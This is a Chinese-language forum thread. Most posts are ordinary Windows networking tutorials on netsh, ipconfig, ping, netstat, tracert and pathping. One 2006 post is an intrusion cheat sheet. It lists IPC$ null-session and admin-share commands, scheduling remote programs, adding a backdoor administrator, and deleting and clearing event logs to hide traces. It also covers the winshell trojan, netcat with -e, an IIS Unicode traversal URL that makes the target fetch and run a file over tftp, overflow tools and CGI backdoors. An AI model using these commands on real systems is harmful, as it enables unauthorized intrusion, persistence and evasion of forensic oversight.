史萊姆論壇

返回   史萊姆論壇 > 教學文件資料庫 > 網路軟硬體架設技術文件
忘記密碼?
註冊帳號 論壇說明 標記討論區已讀

歡迎您來到『史萊姆論壇』 ^___^

您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的!

請點擊這裡:『註冊成為我們的一份子!』

Google 提供的廣告


 
 
主題工具 顯示模式
舊 2004-03-12, 05:14 PM   #1
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設 網管常用的網路命令

作者:佚名

如果你玩過路由器的話,就知道路由器裡面那些很好玩的命令縮寫。
例如,"sh int" 的意思是 "show interface"。

現在 Windows 2000 也有了類似界面的工具,叫做 netsh。

我們在 Windows 2000 的 cmd shell 下,輸入 netsh
就出來:netsh> 提示符,
輸入 int ip 就顯示:
interface ip>
然後輸入 dump ,我們就可以看到當前系統的網路配置:

# ----------------------------------
# Interface IP Configuration
# ----------------------------------
pushd interface ip


# Interface IP Configuration for "Local Area Connection"

set address name = "Local Area Connection" source = static addr = 192.168.1.168
mask = 255.255.255.0
add address name = "Local Area Connection" addr = 192.1.1.111 mask = 255.255.255.0
set address name = "Local Area Connection" gateway = 192.168.1.100 gwmetric = 1
set dns name = "Local Area Connection" source = static addr = 202.96.209.5
set wins name = "Local Area Connection" source = static addr = none


popd
# End of interface IP configuration

上面介紹的是通過交互方式操作的一種辦法。
我們可以直接輸入命令:
"netsh interface ip add address "Local Area Connection" 10.0.0.2
255.0.0.0"
來新增 IP 地址。

如果不知道語法,不要緊的哦!
在提示符下,輸入 ? 就可以找到答案了。方便不方便啊?
原來微軟的東西裡面,也有那麼一些讓人喜歡的玩意兒。可惜,之至者甚少啊!


Windows網路命令行程序
這部分包括:

使用 ipconfig /all 檢視配置
使用 ipconfig /renew 刷新配置
使用 ipconfig 管理 DNS 和 DHCP 類別 ID
使用 Ping 測試連接
使用 Arp 解決硬體地址問題
使用 nbtstat 解決 NetBIOS 名稱問題
使用 netstat 顯示連接統計
使用 tracert 跟蹤網路連接
使用 pathping 測試路由器
使用 ipconfig /all 檢視配置
發現和解決 TCP/IP 網路問題時,先檢查出現問題的電腦上的 TCP/IP 配置。可以
使用 ipconfig 命令獲得主機配置訊息,包括 IP 地址、子網掩碼和預設值閘道。

注意

對於 Windows 95 和 Windows 98 的客戶機,請使用 winipcfg 命令而不是 ipconfi
g 命令。
使用帶 /all 選項的 ipconfig 命令時,將給出所有連接頭的詳細配置報告,包括任何
已配置的串行連接阜。使用 ipconfig /all,可以將命令輸出重定向到某個檔案,並將
輸出貼上到其他文檔中。也可以用該輸出確認網路上每台電腦的 TCP/IP 配置,或
者進一步調查 TCP/IP 網路問題。

例如,如果電腦配置的 IP 地址與現有的 IP 地址重複,則子網掩碼顯示為 0.0.0
.0。

下面的範例是 ipconfig /all 命令輸出,該電腦配置成使用 DHCP 服務器動態配置
TCP/IP,並使用 WINS 和 DNS 服務器解析名稱。

Windows 2000 IP Configuration

Node Type.. . . . . . . . : Hybrid
IP Routing Enabled.. . . . : No
WINS Proxy Enabled.. . . . : No

Ethernet adapter Local Area Connection:

Host Name.. . . . . . . . : corp1.microsoft.com
DNS Servers . . . . . . . : 10.1.0.200
Description. . . . . . . : 3Com 3C90x Ethernet Adapter
Physical Address. . . . . : 00-60-08-3E-46-07
DHCP Enabled.. . . . . . . : Yes
Autoconfiguration Enabled.: Yes
IP Address. . . . . . . . . : 192.168.0.112
Subnet Mask. . . . . . . . : 255.255.0.0
Default Gateway. . . . . . : 192.168.0.1
DHCP Server. . . . . . . . : 10.1.0.50
Primary WINS Server. . . . : 10.1.0.101
Secondary WINS Server. . . : 10.1.0.102
Lease Obtained.. . . . . . : Wednesday, September 02, 1998 10:32:13 AM
Lease Expires.. . . . . . : Friday, September 18, 1998 10:32:13 AM


如果 TCP/IP 配置沒有問題,下一步測試能夠連接到 TCP/IP 網路上的其他主機。

使用 ipconfig /renew 刷新配置
解決 TCP/IP 網路問題時,先檢查遇到問題的電腦上的 TCP/IP 配置。如果電腦
啟用 DHCP 並使用 DHCP 服務器獲得配置,請使用 ipconfig /renew 命令開始刷新租
約。

使用 ipconfig /renew 時,使用 DHCP 的電腦上的所有網卡(除了那些手動配置的
介面卡)都盡量連接到 DHCP 服務器,更新現有配置或者獲得新配置。

也可以使用帶 /release 選項的 ipconfig 命令立即釋放主機的當前 DHCP 配置。有
關 DHCP 和租用過程的詳細訊息,請參閱客戶機如何獲得配置。

注意

對於啟用 DHCP 的 Windows 95 和 Windows 98 客戶,請使用 winipcfg 命令的 rel
ease 和 renew 選項,而不是 ipconfig /release 和 ipconfig /renew 命令,手動
釋放或更新客戶的 IP 配置租約。
使用 ipconfig 管理 DNS 和 DHCP 類別 ID
也可以使用 ipconfig 命令:

顯示或重置 DNS 快取。
詳細訊息,請參閱使用 ipconfig 檢視或重置客戶解析程序快取。

刷新已註冊的 DNS 名稱。
詳細訊息,請參閱使用 ipconfig 更新 DNS 客戶註冊。

顯示介面卡的 DHCP 類別 ID。
詳細訊息,請參閱顯示客戶機上的 DHCP 類別 ID 訊息。

設置介面卡的 DHCP 類別 ID。
詳細訊息,請參閱設置客戶機上的 DHCP 類別 ID 訊息。

使用 Ping 測試連接
Ping 命令有助於驗證 IP 級的連通性。發現和解決問題時,可以使用 Ping 向目標主
機名或 IP 地址發送 ICMP 回應請求。需要驗證主機能否連接到 TCP/IP 網路和網路
資源時,請使用 Ping。也可以使用 Ping 隔離網路硬體問題和不相容配置。

通常最好先用 Ping 命令驗證本地電腦和網路主機之間的路由是否存在,以及要連
接的網路主機的 IP 地址。Ping 目標主機的 IP 地址看它是否回應,如下:

ping IP_address

使用 Ping 時應該執行以下步驟:

Ping 環回地址驗證是否在本地電腦上安裝 TCP/IP 以及配置是否正確。
ping 127.0.0.1

Ping 本地電腦的 IP 地址驗證是否正確地新增到網路。
ping IP_address_of_local_host

Ping 預設值閘道的 IP 地址驗證預設值閘道是否執行以及能否與本地網路上的本地主機通
訊。
ping IP_address_of_default_gateway

Ping 遠端主機的 IP 地址驗證能否通過路由器通訊。
ping IP_address_of_remote_host

Ping 命令用 Windows 套接字樣式的名稱解析將電腦名解析成 IP 地址,所以如果
用地址成功,但是用名稱 Ping 失敗,則問題出在地址或名稱解析上,而不是網路連
通性的問題。詳細訊息,請參閱使用 Arp 解決硬體地址問題。

如果在任何點上都無法成功地使用 Ping,請確認:

安裝和配置 TCP/IP 之後重新啟動電腦。
「Internet 協議 (TCP/IP) 內容」對話視窗「一般」選擇項上的本地電腦的 IP 地址
有效而且正確。
啟用 IP 路由,並且路由器之間的鏈路是可用的。
您可以使用 Ping 命令的不同選項來指定要使用的資料包大小、要發送多少資料包、
是否記錄用過的路由、要使用的生存時間 (TTL) 值以及是否設置「不分段」標誌。可
以鍵入 ping -? 檢視這些選項。

下例說明如何向 IP 地址 172.16.48.10 發送兩個 Ping,每個都是 1,450 字節:

C:\>ping -n 2 -l 1450 172.16.48.10
Pinging 172.16.48.10 with 1450 bytes of data:

Reply from 172.16.48.10:bytes=1450 time<10ms TTL=32
Reply from 172.16.48.10:bytes=1450 time<10ms TTL=32

Ping statistics for 157.59.8.1:
Packets:Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate roundtrip times in milli-seconds:
Minimum = 0ms, Maximum = 10ms, Average = 2ms
預設值情況下,在顯示「請求超時」之前,Ping 等待 1,000 毫秒(1 秒)的時間讓每個回應返回。如果通過 Ping 探測的遠端系統經過長時間延遲的鏈路,如衛星鏈路,則回應可能會花更長的時間才能返回。可以使用 -w (等待)選項指定更長時間的超時。

使用 Arp 解決硬體地址問題
「地址解析協議 (ARP)」允許主機搜尋同一物理網路上的主機的媒體訪問控制地址,如果給出後者的 IP 地址。為使 ARP 更加有效,每個電腦快取 IP 到媒體訪問控制地址映射消除重複的 ARP 廣播請求。

可以使用 arp 命令檢視和修改本地電腦上的 ARP 表項。arp 命令對於檢視 ARP 快取和解決地址解析問題非常有用。

詳細訊息,請參閱檢視「地址解析協議 (ARP)」快取和新增靜態 ARP 快取項目。

使用 nbtstat 解決 NetBIOS 名稱問題
TCP/IP 上的 NetBIOS (NetBT) 將 NetBIOS 名稱解析成 IP 地址。TCP/IP 為 NetBIOS 名稱解析提供了很多選項,包括本地快取搜索、WINS 服務器查詢、廣播、DNS 服務器查詢以及 Lmhosts 和主機檔案搜索。

Nbtstat 是解決 NetBIOS 名稱解析問題的有用工具。可以使用nbtstat 命令刪除或更正預載入執行的項目:

nbtstat -n 顯示由服務器或重定向器之類的程序在系統上本地註冊的名稱。
nbtstat -c 顯示 NetBIOS 名稱快取,包含其他電腦的名稱對地址映射。
nbtstat -R 清除名稱快取,然後從 Lmhosts 檔案重新載入執行。
nbtstat -RR 釋放在 WINS 服務器上註冊的 NetBIOS 名稱,然後刷新它們的註冊。
nbtstat -a name 對 name 指定的電腦執行 NetBIOS 介面卡狀態命令。介面卡狀態命令將返回電腦的本地 NetBIOS 名稱表,以及介面卡的媒體訪問控制地址。
nbtstat -S 列出當前的 NetBIOS 會話及其狀態(包括統計),如下例所示:
NetBIOS connection table

Local name State In/out Remote Host Input Output
------------------------------------------------------------------
CORP1 <00> Connected Out CORPSUP1<20> 6MB 5MB
CORP1 <00> Connected Out CORPPRINT<20> 108KB 116KB
CORP1 <00> Connected Out CORPSRC1<20> 299KB 19KB
CORP1 <00> Connected Out CORPEMAIL1<20> 324KB 19KB
CORP1 <03> Listening
使用 netstat 顯示連接統計
可以使用 netstat 命令顯示協議統計訊息和當前的 TCP/IP 連接。netstat -a 命令將顯示所有連接,而 netstat -r 顯示路由表和活動連接。netstat -e 命令將顯示Ethernet 統計訊息,而 netstat -s 顯示每個協議的統計訊息。如果使用 netstat -n,則不能將地址和連接阜號轉換成名稱。下面是 netstat 的輸出示例:

C:\>netstat -e
Interface Statistics

Received Sent
Bytes 3995837940 47224622
Unicast packets 120099 131015
Non-unicast packets 7579544 3823
Discards 0 0
Errors 0 0
Unknown protocols 363054211

C:\>netstat -a

Active Connections

Proto Local Address Foreign Address State
TCP CORP1:1572 172.16.48.10:nbsession ESTABLISHED
TCP CORP1:1589 172.16.48.10:nbsession ESTABLISHED
TCP CORP1:1606 172.16.105.245:nbsession ESTABLISHED
TCP CORP1:1632 172.16.48.213:nbsession ESTABLISHED
TCP CORP1:1659 172.16.48.169:nbsession ESTABLISHED
TCP CORP1:1714 172.16.48.203:nbsession ESTABLISHED
TCP CORP1:1719 172.16.48.36:nbsession ESTABLISHED
TCP CORP1:1241 172.16.48.101:nbsession ESTABLISHED
UDP CORP1:1025 *:*
UDP CORP1:snmp *:*
UDP CORP1:nbname *:*
UDP CORP1:nbdatagram *:*
UDP CORP1:nbname *:*
UDP CORP1:nbdatagram *:*

C:\>netstat -s
IP Statistics

Packets Received = 5378528
Received Header Errors = 738854
Received Address Errors = 23150
Datagrams Forwarded = 0
Unknown Protocols Received = 0
Received Packets Discarded = 0
Received Packets Delivered = 4616524
Output Requests = 132702
Routing Discards = 157
Discarded Output Packets = 0
Output Packet No Route = 0
Reassembly Required = 0
Reassembly Successful = 0
Reassembly Failures =
Datagrams Successfully Fragmented = 0
Datagrams Failing Fragmentation = 0
Fragments Created = 0

ICMP Statistics
Received Sent
Messages 693 4
Errors 0 0
Destination Unreachable 685 0
Time Exceeded 0 0
Parameter Problems 0 0
Source Quenches 0 0
Redirects 0 0
Echoes 4 0
Echo Replies 0 4
Timestamps 0 0
Timestamp Replies 0 0
Address Masks 0 0
Address Mask Replies 0 0

TCP Statistics

Active Opens = 597
Passive Opens = 135
Failed Connection Attempts = 107
Reset Connections = 91
Current Connections = 8
Segments Received = 106770
Segments Sent = 118431
Segments Retransmitted = 461

UDP Statistics

Datagrams Received = 4157136
No Ports = 351928
Receive Errors = 2
Datagrams Sent = 13809

使用 tracert 跟蹤網路連接
Tracert(跟蹤路由)是路由跟蹤實用程序,用於確定 IP 資料報訪問目標所採取的路徑。Tracert 命令用 IP 生存時間 (TTL) 字列和 ICMP 錯誤消息來確定從一個主機到網路上其他主機的路由。

Tracert 工作原理
通過向目標發送不同 IP 生存時間 (TTL) 值的「Internet 控制消息協議 (ICMP)」回應資料包,Tracert 診斷程序確定到目標所採取的路由。要求路徑上的每個路由器在轉發資料包之前至少將資料包上的 TTL 遞減 1。資料包上的 TTL 減為 0 時,路由器應該將「ICMP 已超時」的消息發回源系統。

Tracert 先發送 TTL 為 1 的回應資料包,並在隨後的每次發送過程將 TTL 遞增 1,直到目標回應或 TTL 達到最大值,從而確定路由。通過檢查中間路由器發回的「ICMP 已超時」的消息確定路由。某些路由器不經詢問直接丟棄 TTL 過期的資料包,這在Tracert 實用程序中看不到。

Tracert 命令按順序列印出返回「ICMP 已超時」消息的路徑中的近端路由器連接頭列表。如果使用 -d 選項,則 Tracert 實用程序不在每個 IP 地址上查詢 DNS。

在下例中,資料包必須通過兩個路由器(10.0.0.1 和 192.168.0.1)才能到達主機
172.16.0.99。主機的預設值閘道是 10.0.0.1,192.168.0.0 網路上的路由器的 IP 地
址是 192.168.0.1。

C:\>tracert 172.16.0.99 -d
Tracing route to 172.16.0.99 over a maximum of 30 hops
1 2s 3s 2s 10,0.0,1
2 75 ms 83 ms 88 ms 192.168.0.1
3 73 ms 79 ms 93 ms 172.16.0.99
Trace complete.
用 tracert 解決問題
可以使用 tracert 命令確定資料包在網路上的停止位置。下例中,預設值閘道確定 19
2.168.10.99 主機沒有有效路徑。這可能是路由器配置的問題,或者是 192.168.10.
0 網路不存在(錯誤的 IP 地址)。

C:\>tracert 192.168.10.99

Tracing route to 192.168.10.99 over a maximum of 30 hops

1 10.0.0.1 reportsestination net unreachable.

Trace complete.

Tracert 實用程序對於解決大網路問題非常有用,此時可以採取幾條路徑到達同一個
點。

Tracert 命令行選項
Tracert 命令支持多種選項,如下表所示。

tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

選項 描述
-d 指定不將 IP 地址解析到主機名稱。
-h maximum_hops 指定躍點數以跟蹤到稱為 target_name 的主機的路由。
-j host-list 指定 Tracert 實用程序資料包所採用路徑中的路由器連接頭列表。
-w timeout 等待 timeout 為每次回覆所指定的毫秒數。
target_name 目標主機的名稱或 IP 地址。

詳細訊息,請參閱使用 tracert 命令跟蹤路徑。

使用 pathping 測試路由器
pathping 命令是一個路由跟蹤工具,它將 ping 和 tracert 命令的功能和這兩個工具所不提供的其他訊息結合起來。pathping 命令在一段時間內將資料包發送到到達最終目標的路徑上的每個路由器,然後基於資料包的電腦結果從每個躍點返回。由於命令顯示資料包在任何給定路由器或鏈接上丟失的程度,因此可以很容易地確定可能導致網路問題的路由器或鏈接。某些選項是可用的,如下表所示。

選項 名稱 功能
-n Hostnames 不將地址解析成主機名。
-h Maximum hops 搜索目標的最大躍點數。
-g Host-list 沿著路由列表釋放源路由。
-p Period 在 ping 之間等待的毫秒數。
-q Num_queries 每個躍點的查詢數。
-w Time-out 為每次回覆所等待的毫秒數。
-T Layer 2 tag 將第 2 層優先級標記(例如,對於 IEEE 802.1p)連接到資料包並將它發送到路徑中的每個網路設備。這有助於標誌沒有正確配置第 2 層優先級的網路設備。-T 開關用於測試服務品質 (QoS) 連通性。
-R RSVP isbase Che檢查以確定路徑中的每個路由器是否支持「資源保留協議 (RSVP)」,此協議允許主機為資料流保留一定量的帶寬。 -R 開關用於測試服務品質 (QoS) 連通性。

預設值的躍點數是 30,並且超時前的預設值等待時間是 3 秒。預設值時間是 250 毫秒,並且沿著路徑對每個路由器進行查詢的次數是 100。

以下是典型的 pathping 報告。躍點列表後所編輯的統計訊息表明在每個獨立路由器上資料包丟失的情況。


D:\> pathping -n msw

Tracing route to msw [7.54.1.196]
over a maximum of 30 hops:
0 172.16.87.35
1 172.16.87.218
2 192.68.52.1
3 192.68.80.1
4 7.54.247.14
5 7.54.1.196

Computing statistics for 125 seconds...
Source to Here This Node/Link
Hop RTT Lost/Sent = Pct Lost/Sent = Pct Address
0 172.16.87.35
0/ 100 = 0% |
1 41ms 0/ 100 = 0% 0/ 100 = 0% 172.16.87.218
13/ 100 = 13% |
2 22ms 16/ 100 = 16% 3/ 100 = 3% 192.68.52.1
0/ 100 = 0% |
3 24ms 13/ 100 = 13% 0/ 100 = 0% 192.68.80.1
0/ 100 = 0% |
4 21ms 14/ 100 = 14% 1/ 100 = 1% 10.54.247.14
0/ 100 = 0% |
5 24ms 13/ 100 = 13% 0/ 100 = 0% 10.54.1.196

Trace complete.

當執行 pathping 時,在測試問題時首先檢視路由的結果。此路徑與 tracert 命令所顯示的路徑相同。然後 pathping 命令對下一個 125 毫秒顯示忙消息(此時間根據躍點計數變化)。


在此期間,pathping 從以前列出的所有路由器和它們之間的鏈接之間收集訊息。在此期間結束時,它顯示測試結果。

最右邊的兩欄 This Node/Link Lost/Sent=Pct 和 Address 包含的訊息最有用。

172.16.87.218(躍點 1)和 192.68.52.1(躍點 2)丟失 13% 的資料包。 所有其他鏈接工作正常。在躍點 2 和 4 中的路由器也丟失尋址到它們的資料包(如 This Node /Link 欄中所示),但是該丟失不會影響轉發的路徑。

對鏈接顯示的丟失率(在最右邊的欄中標記為 |)表明沿路徑轉發丟失的資料包。該丟失表明鏈接阻塞。對路由器顯示的丟失率(通過最右邊欄中的 IP 地址顯示)表明這些路由器的 CPU 可能超負荷執行。

這些阻塞的路由器可能也是端對端問題的一個因素,尤其是在軟體路由器轉發資料包時。



_____________________________@

`
ChinaLanTian@Msn.Com
psac 目前離線  
送花文章: 3, 收花文章: 1630 篇, 收花: 3204 次
舊 2004-03-12, 07:45 PM   #2 (permalink)
註冊會員
 
Evan 的頭像
榮譽勳章
UID - 2035
在線等級: 級別:6 | 在線時長:70小時 | 升級還需:7小時
註冊日期: 2002-12-06
VIP期限: 2007-09
住址: ☆桃園-金門-新竹☆
文章: 432
精華: 0
現金: -6 金幣
資產: 1403 金幣
預設

還真多啊…有的學了…謝謝大大分享!
Evan 目前離線  
送花文章: 17, 收花文章: 9 篇, 收花: 19 次
舊 2004-03-14, 04:29 PM   #3 (permalink)
ufoon
榮譽勳章

勳章總數
UID -
在線等級:
文章: n/a
精華:
預設

好 屌 阿
 
送花文章: 0, 收花文章: 0 篇, 收花: 0 次
舊 2006-03-01, 09:09 PM   #4 (permalink)
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設

網管和黑客都必須知道的指令!看了不要做壞事!

常用的幾條NET指令:

==================================================

(與遠端主機建立空管連接) net use \\IP位址\ipc$ "" /use:""

(以管理員身份登入遠端主機) net use \\IP位址\ipc$ "密碼" /use:"Administrator"

(傳送文件到遠端主機WINNT目錄下)copy 本地機目錄路徑\程序 \\IP位址\admin$

(檢視遠端主機時間) net time \\IP位址

(定時啟動某個程序) at \\IP位址 02:18 readme.exe

(檢視共享) net view \\IP位址

(檢視netbios工作組列表) nbtstat -A IP位址

(將遠端主機C碟映射為自己的F盤) net use f: \\IP位址\c$ ""/user:"Administrator"

(這兩條把自己增加到管理員組): net user 用戶名 密碼 /add

net localgroup Administrators 用戶名 /add

(中斷連線連接) net use \\IP位址\ipc$ /delete

=====================================================

擦屁屁:

del C:\winnt\system32\logfiles\*.*

del C:\winnt\ssytem32\config\*.evt

del C:\winnt\system32\dtclog\*.*

del C:\winnt\system32\*.log

del C:\winnt\system32\*.txt

del C:\winnt\*.txt

del C:\winnt\*.log

============================

一、netsvc.exe

下面的指令分別是列出主機上的服務項目、查尋和遠端啟動主機的「時間工作」服務:

netsvc /list \\IP位址

netsvc schedule \\IP位址 /query

netsvc \\IP位址 schedule /start

二、OpenTelnet.exe

遠端啟動主機的Telnet服務,並綁定連接阜到7878,例如:

OpenTelnet \\IP位址 用戶名 密碼 1 7878

然後就可以telnet到主機的7878連接阜,進入DOS方式下:

telnet IP位址 7878

三、winshell.exe

一個非常小的木馬(不到6K),telnet到主機的7878連接阜,輸入密碼winshell,當看到CMD>後,可打下面的指令:

p Path (檢視winshell主程序的路徑訊息)

b reBoot (重新啟動機器)

d shutDown (關閉機器)

s Shell (執行後你就會看到可愛的「C:\>」)

x eXit (結束本次登入會話,此指令並不終止winshell的執行)

CMD> http://.../srv.exe (通過http下載其他網站上的文件到執行winshell的電腦上)

四、3389登入器,GUI方式登入遠端主機的

五、elsave.exe

事件日誌清除工具

elsave -s \\IP位址 -l "application" -C

elsave -s \\IP位址 -l "system" -C

elsave -s \\IP位址 -l "security" -C

執行後成功清除應用程式日誌,系統日誌,安全日誌

六、hbulot.exe

開啟win2kserver和winxp的3389服務

hbulot [/r]

使用/r表示安裝完成後自動重新啟動目標使設定生效。

七、nc.exe(netcat.exe)

一個很好的工具,一些指令碼程序都要用到它,也可做溢位後的連接用。

想要連線到某處: nc [-options] hostname port[s] [ports] ...

綁定連接阜等待連接: nc -l -p port [-options] [hostname] [port]

參數:

-e prog 程序重轉發IP,一旦連接,就執行 [危險!!]

-g gateway source-routing hop point[s], up to 8

-G num source-routing pointer: 4, 8, 12, ...

-h 說明 訊息

-i secs 延時的間隔

-l 監聽模式,用於入站連接

-n 指定數位的IP位址,不能用hostname

-o file 記錄16進制的傳輸

-p port 本機連接阜號

-r 任意指定本機及遠端連接阜

-s addr 本機源位址

-u UDP模式

-v 詳細輸出——用兩個-v可得到更詳細的內容

-w secs timeout的時間

-z 將輸入輸出關掉——用於掃瞄時

八、TFTPD32.EXE

把自己的電腦臨時變為一台FTP伺服器,讓目標物來下載文件,tftp指令要在目標物上執行,通常要利用Unicode漏洞或telnet到目標物,例如:

http://IP位址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本地機IP位址 get 檔案名 c:\winnt\system32\檔案名

然後可以直接令文件執行:

http://IP位址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+檔案名

九、prihack.exe是IIS的printer遠端緩衝區溢位工具。idqover.exe是溢位idq的,選項「溢位後在一個連接阜監聽」,然後用telnet連接它的監聽連接阜,如果溢位成功,一連它的連接阜,綁定的指令馬上執行。xploit.exe是一個圖形界面的ida溢位,成功以後winxp下需要打winxp。

一○、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執行權限的目錄。然後用IE瀏覽器連接。

一、一 Xscan指令行執行參數說明:

在檢測程序中,按"[空格]"鍵可以檢視各執行緒狀態及掃瞄進度,按"q"鍵儲存當前資料後提前結束程序,按"<ctrl+c>"強行關閉程序。

1.指令格式: xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項]

xscan -file <主機列表檔案名> <檢測項目> [其他選項]

其中<檢測項目> 含義如下:

-port : 檢測常用服務的連接阜狀態(可通過\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"項設定待檢測連接阜列表);

-ftp : 檢測FTP弱密碼(可通過\dat\config.ini文件設定用戶名/密碼字典文件);

-ntpass : 檢測NT-Server弱密碼(可通過\dat\config.ini文件設定用戶名/密碼字典文件);

-cgi : 檢測CGI漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設定編碼方案);

-iis : 檢測IIS漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設定編碼方案);

[其他選項] 含義如下:

-v: 顯示詳細掃瞄進度

-p: 跳過Ping不通的主機

-o: 跳過沒有檢測到開放連接阜的主機

-t <並發執行緒數量[,並發主機數量]>: 指定最大並發執行緒數量和並發主機數量, 預設數量為100,10
__________________
http://bbsimg.qianlong.com/upload/01/08/29/68/1082968_1136014649812.gif
psac 目前離線  
送花文章: 3, 收花文章: 1630 篇, 收花: 3204 次
舊 2006-03-08, 11:33 PM   #5 (permalink)
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設

netsh.exe組態TCP/IP
首先,它可以顯示你TCP/IP傳輸協定的相關設定。在指令提示視窗(CMD.EXE)裡輸入下列指令:

  netsh interface ip show config
  你還可以用它來更改電腦的IP位址或者組態TCP/IP的其它相關內容。例如,你想為電腦的「本地機連接」指定一個靜態的IP位址:192.168.0.100,設定其子網路遮罩?55.255.255.0,並指定預設網路閘道為192.168.0.1,你只需要在指令提示視窗裡輸入下列指令就可以了:netsh interface ip set address name="Local Area Connection" static 192.168.0.100 255.255.255.0 192.168.0.1 1
(注意:這是一條完整的指令,輸入的時候請不要換行。)
如果你有一台筆記型電腦,而且你需要在兩個以上不同的地方接入網路(並且每個網路都需要使用靜態IP位址),那麼你也可以使用netsh.exe來快速地切換TCP/IP設定,以適應不同網路的需要。ntesh.exe可以把不同的TCP/IP設定匯出成不同的組態文件,然後在需要的時候匯入組態文件來更改相應的設定。

  例如,現在你的筆記型接入了網路1,並且已經做好了相應的網路設定。這時你可以在指令提示視窗輸入:
  netsh -c interface dump > c:\location1.txt
  通過這條指令把相應的TCP/IP設定匯出至c:\下檔案名為location1.txt的文本文件。以此類推,你可以把不同網路環境的設定匯出到不同的組態文件中。在需要接入不同的網路中時,你只需要使用下面這條指令就可以了:

  netsh -f c:\location1.txt(或者:netsh -f c:\location2.txt)
  除此之外,你還可以通過netsh.exe來組態網路橋接器,讓它從DHCP服務器自動獲得IP位址。指令如下:

  netsh interface ip set address "Local Area Connection" dhcp
  還可以進行WINS組態:

  netsh interface ip set wins "Local Area Connection" static 192.168.0.200
  當然,只要你想,你還可以通過netsh.exe使網路橋接器動態獲得DNS設定:

  netsh interface ip set dns "Local Area Connection" dhcp
  現在你知道了吧,netsh.exe是一個很有用的自訂TCP/IP設定的工具。
psac 目前離線  
送花文章: 3, 收花文章: 1630 篇, 收花: 3204 次
 


主題工具
顯示模式

發表規則
不可以發文
不可以回覆主題
不可以上傳附加檔案
不可以編輯您的文章

論壇啟用 BB 語法
論壇啟用 表情符號
論壇啟用 [IMG] 語法
論壇禁用 HTML 語法
Trackbacks are 禁用
Pingbacks are 禁用
Refbacks are 禁用


所有時間均為台北時間。現在的時間是 11:47 AM


Powered by vBulletin® 版本 3.6.8
版權所有 ©2000 - 2020, Jelsoft Enterprises Ltd.


SEO by vBSEO 3.6.1